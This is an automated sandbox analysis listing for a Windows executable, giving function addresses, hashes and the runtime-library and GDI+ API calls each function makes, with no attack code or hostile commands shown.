Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\4h1Zc12ZBe.exe
API String ID: 2506810119-4278656385
Opcode ID: 416fb4b61b69f5dea1a2f56e2c6aaba505321d1dbe5459c58811bee866d4ad7d
Instruction ID: c6131cd564761d971ae4564b27f669575df7a0de8551e85e99f40772aa372235
Opcode Fuzzy Hash: 416fb4b61b69f5dea1a2f56e2c6aaba505321d1dbe5459c58811bee866d4ad7d
Instruction Fuzzy Hash: 70316871B04324AFDB21DF95E885D9FBBFCDB85714B50406BE80497311D6748E81CB99

Function 0041501A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041502E
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00415052
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415065

Strings

pScheduler, xrefs: 0041505D

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 1fd365d1dc0ad617a47add25ffd3bb4494613aa2f7fd30b609aab44b67858b2d
Instruction ID: f2a0ca25004a96b6accaf6087fb1873220c1a65a9c0310887971735cd9d25b9c
Opcode Fuzzy Hash: 1fd365d1dc0ad617a47add25ffd3bb4494613aa2f7fd30b609aab44b67858b2d
Instruction Fuzzy Hash: 35F02431900604A7C720F696DC52DDEB7399EC4718720456FA012231C2DB79A986C6AD

Function 0042DA04 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0042DA8F
__alldvrm.LIBCMT ref: 0042DC90
__alldvrm.LIBCMT ref: 0042DCB2

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a8b7523c8ed4b5a79b5d40fe74d00392223d3623dbfbd04b7bbb2f45ae15c96f
Instruction ID: 436b25c043a2c094e76709c809d21d8ea4163d804efd1d24e3d6d0813fbe46fa
Opcode Fuzzy Hash: a8b7523c8ed4b5a79b5d40fe74d00392223d3623dbfbd04b7bbb2f45ae15c96f
Instruction Fuzzy Hash: 48A16672F042A29FDB21CF19E8917AEBBA5EF15304F54416FE4859B381C27C9D42C758

Function 00437F38 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00438067

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 11313c44f38d615c9d69684cfb326c66f11b8d4d5e227cfd332666a4dae0d8d6
Instruction ID: afa42d97cd0fbb6144e8b5cacb4531e3347dd1d997f588883b1c7225f6ff4ec2
Opcode Fuzzy Hash: 11313c44f38d615c9d69684cfb326c66f11b8d4d5e227cfd332666a4dae0d8d6
Instruction Fuzzy Hash: 37414A71B042109ADB386E7AAC81A7F7AB4EF0A374F11521FF418A7291DF7C484546AD

Function 00405FCD Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00406025
__Xtime_diff_to_millis2.LIBCPMT ref: 0040603F
_xtime_get.LIBCPMT ref: 00406062
__Xtime_diff_to_millis2.LIBCPMT ref: 0040606E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 67b41c0a6bf50f5c9788e02e2df772dbf9038e8b0d97e27927c32c2e39432442
Instruction ID: 4b22fd9b95ea77e98776432d82eb9fdff3ae96d0bc4595b995c8410c105b5752
Opcode Fuzzy Hash: 67b41c0a6bf50f5c9788e02e2df772dbf9038e8b0d97e27927c32c2e39432442
Instruction Fuzzy Hash: 68211D75E002199FDF00EFA5D8419AEB7B9EF48714F11002AFA02B7291D7399D118BA5

Function 004211B9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004211D3

Part of subcall function 00421120: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042114F
Part of subcall function 00421120: ___AdjustPointer.LIBCMT ref: 0042116A

_UnwindNestedFrames.LIBCMT ref: 004211E8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004211F9
CallCatchBlock.LIBVCRUNTIME ref: 00421221

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: e2367a3ae9063364a15f4915855f5ea9174f71a910bc1666315ef1a98ae205ea
Instruction ID: b5752b61ea9f4665e83eb8338e1e13f90d7596e5989ec7ca07f76c84844fee8a
Opcode Fuzzy Hash: e2367a3ae9063364a15f4915855f5ea9174f71a910bc1666315ef1a98ae205ea
Instruction Fuzzy Hash: 92016D32200158BBCF126E92DC41EEB3B7AEF68748F444109FE0896121C73AE861DBA4

Function 0042D09B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0042D042,?,00000000,00000000,00000000,?,0042D2FA,00000006,FlsSetValue), ref: 0042D0CD
GetLastError.KERNEL32(?,0042D042,?,00000000,00000000,00000000,?,0042D2FA,00000006,FlsSetValue,00441EC8,FlsSetValue,00000000,00000364,?,0042A0AC), ref: 0042D0D9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0042D042,?,00000000,00000000,00000000,?,0042D2FA,00000006,FlsSetValue,00441EC8,FlsSetValue,00000000), ref: 0042D0E7

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 52fdac3cfb473c178d1fd4ba34e5a352314f18f02e7db7171f7901f8d35c6576
Instruction ID: 9a06ee70fd0bb77c0199f8202ed0ea6d31524a7cd5f71c2b29de5d539510ff1f
Opcode Fuzzy Hash: 52fdac3cfb473c178d1fd4ba34e5a352314f18f02e7db7171f7901f8d35c6576
Instruction Fuzzy Hash: 8401D432B01236ABCB214A78BC44B677B98EF457A6B700631FA05D7291DB28D811C6E8

Function 0041E33B Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0041E355
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0041E369
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 0041E381
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0041E399

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 5133b44c9d0851586e8fc24ce9839c0fe0c7128a9ca53009484fa93592ebf4fe
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: D301263A600218B7CF15AE978841EEF77999F50354F04001BFC25AB381DA74ED8192A5

Function 0040FB2D Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A94A: TlsGetValue.KERNEL32(?,?,00408D3B,0040AE75,00000000,?,00408D19,?,?,?,00000000,?,00000000), ref: 0040A950

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0040FB57

Part of subcall function 004191C0: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 004191E7
Part of subcall function 004191C0: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00419200
Part of subcall function 004191C0: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00419276
Part of subcall function 004191C0: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0041927E

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0040FB65
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 0040FB6F
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0040FB79

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: cc1640bf82e2018a066b6ee18931e2425d7f72e4ffad5ac7f080e3bc2ddee531
Instruction ID: 7ac627b668c230b9ab092d62e122e26e147821b0d95a114b95b14b60a938984e
Opcode Fuzzy Hash: cc1640bf82e2018a066b6ee18931e2425d7f72e4ffad5ac7f080e3bc2ddee531
Instruction Fuzzy Hash: 85F0FC35A0021427CA267736DC219AEBB669F80768B00007FF400536D1DF7CAE95CBCE

Function 004140E4 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00414116
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00414126
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00414136
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041414A

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 70eeb7f55dd8a116adff50ae70c6ea51dd14baf489d1166cd06d1a7f59a4613c
Instruction ID: 5ff2bfc535935169fd9502de22c4ce47e60623fcb9f654b9a880d5b810d5fb18
Opcode Fuzzy Hash: 70eeb7f55dd8a116adff50ae70c6ea51dd14baf489d1166cd06d1a7f59a4613c
Instruction Fuzzy Hash: 6C01193250410EBBCF129E54DD0A8EE3B66EBA4764F188517FD2885271C336D6F1AB4A

Function 00405E01 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004092BB

Part of subcall function 00408B2D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00408B4F
Part of subcall function 00408B2D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00408B70

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004092CE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004092DA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004092E3

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: a3daba0ef3bf4998bd6f3c0eaf10ba49fe4d6a15ca2d980106deb8721dc94ef8
Instruction ID: a7a0c0109efd0d107e3628353e0b02e4719bbb8524c25fc3548d5f22e25abdb9
Opcode Fuzzy Hash: a3daba0ef3bf4998bd6f3c0eaf10ba49fe4d6a15ca2d980106deb8721dc94ef8
Instruction Fuzzy Hash: C6F02471A0020677CF14BAB608526BE32964F50328B0405BFB5127B3D2DE7C9D01925D

Function 00426FCD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042705D

Strings

pow, xrefs: 00427035, 00427052

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4ad6c320e9f8ac263e4fdbe580239ce4999f99d19e55ddce46f49e1778f528ce
Instruction ID: dbe9944119ea6631252ec9dcad33d31ebda9e870f277f3fffe1dcb90592dbe3e
Opcode Fuzzy Hash: 4ad6c320e9f8ac263e4fdbe580239ce4999f99d19e55ddce46f49e1778f528ce
Instruction Fuzzy Hash: 07516865B0C20186C7157B24E92137F2BA09F44750FA05E6BF4D5423EAEB3C8CD99E8E

Function 004332AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00433509,?,00000050,?,?,?,?,?), ref: 00433389

Strings

OCP, xrefs: 00433302
ACP, xrefs: 004332CC

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b4415eb88f03c5159e1d8a8546330c50094aa7d7a162a630a7ee43998478baa2
Instruction ID: 8d045ba67d6b3003de46d0ccdd01f06549987213fdc9cd731cad06b3254028a9
Opcode Fuzzy Hash: b4415eb88f03c5159e1d8a8546330c50094aa7d7a162a630a7ee43998478baa2
Instruction Fuzzy Hash: C221D362B00105A6E720CF65C901BAB73A6AB5CB63F56D166ED09DB300EF3ADF018358

Function 0042CD4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042CDC3

Strings

XAE, xrefs: 0042CD90
TAE, xrefs: 0042CD7E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID: TAE$XAE
API String ID: 269201875-3167391760
Opcode ID: 60b49e61a8a9578131377ff273cfdfa423131fdfe105b47be54f4f7ea98ede61
Instruction ID: c51b99eac70bda3d14e33e78ca42452711ed15db662985568e235992e54d4b10
Opcode Fuzzy Hash: 60b49e61a8a9578131377ff273cfdfa423131fdfe105b47be54f4f7ea98ede61
Instruction Fuzzy Hash: D911B4752007219FD7209F2AF4C1B9A7BE4EB54398B60443FE58987242EB79E885C79C

Function 004014A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004014BF
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 004014E4

Strings

image/png, xrefs: 004014F2

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: 9fb5e59ed81319e7edbb8934f65c951e4ba9100295b3e16fedd0ec57c9683c0d
Instruction ID: 1c85f20b1b4ba596d18920901d7e94364edc00253b0001803c517d8df12edd72
Opcode Fuzzy Hash: 9fb5e59ed81319e7edbb8934f65c951e4ba9100295b3e16fedd0ec57c9683c0d
Instruction Fuzzy Hash: 7711C176D00209FBCB01DF999D8089EBB75FE81360B60027BE911B62E0D7759E419A58

Function 0040744D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,00406589,004054C6,?,?,00000000,?,00405396,00454454,00405363,0045444C,?,ios_base::failbit set,004054C6), ref: 004074D1

Strings

LDE, xrefs: 004074AD, 0040745F

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast
String ID: LDE
API String ID: 1452528299-342004392
Opcode ID: e5d8a9b78b7be40429d74ecdec2100b33ab2082edc35ad7600213665a3e6ad13
Instruction ID: f6fdd136fd39749cc4e768892b70aafb324c543394fcdc41a650b82e2f9dbe13
Opcode Fuzzy Hash: e5d8a9b78b7be40429d74ecdec2100b33ab2082edc35ad7600213665a3e6ad13
Instruction Fuzzy Hash: 06118232708225AFCF125F64DC44A6ABF65FF48761B01803AFA06A6290D774AC51DBE6

Function 0040B77B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 0040B7F6
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 0040B849

Strings

d:E, xrefs: 0040B7EE

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: d:E
